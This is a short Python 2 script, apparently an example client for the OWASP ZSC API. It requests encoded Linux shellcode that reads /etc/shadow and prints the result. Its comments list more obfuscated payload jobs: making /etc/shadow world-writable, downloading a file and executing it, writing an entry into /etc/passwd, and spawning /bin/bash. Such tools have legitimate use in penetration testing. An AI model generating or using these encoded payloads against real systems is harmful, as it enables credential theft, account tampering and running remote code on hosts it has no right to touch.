1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| #http://zsc.z3r0d4y.com/api
import httplib, urllib
params = urllib.urlencode({
'api_name': 'zsc',#it's API name, if you want use OWASP ZSC, You must fill it with 'zsc'
'os': 'linux_x86',# os name here
'job': 'system(\'cat[space]/etc/shadow\')',
'encode': 'add_random'}) #encoding type
#function to use [ support: All except "script_executor()" ]
#to see available features visit: http://zsc.z3r0d4y.com/table.html
#inputs: same argv in terminal http://zsc.z3r0d4y.com/wiki/
#>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
#>zsc -os linux_x86 -encode xor_random -job "system('ls[space]-la')" -o file.txt
#>zsc -os linux_x86 -encode xor_0x41414141 -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
#>zsc -os linux_x86 -encode add_random -job "system('wget[space]file;sh[space]file')" -o file.txt
#>zsc -os linux_x86 -encode mix_all -job "chmod('/etc/shadow','777')" -o file.txt
#>zsc -os linux_x86 -encode inc -job "write('/etc/passwd','user:pass')" -o file.txt
#>zsc -os linux_x86 -encode dec_11 -job "exec('/bin/bash')" -o file.txt
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'}
conn = httplib.HTTPConnection('api.z3r0d4y.com')
conn.request("POST", "", params, headers)
response = conn.getresponse()
shellcode = response.read().replace('\n','')
print shellcode
|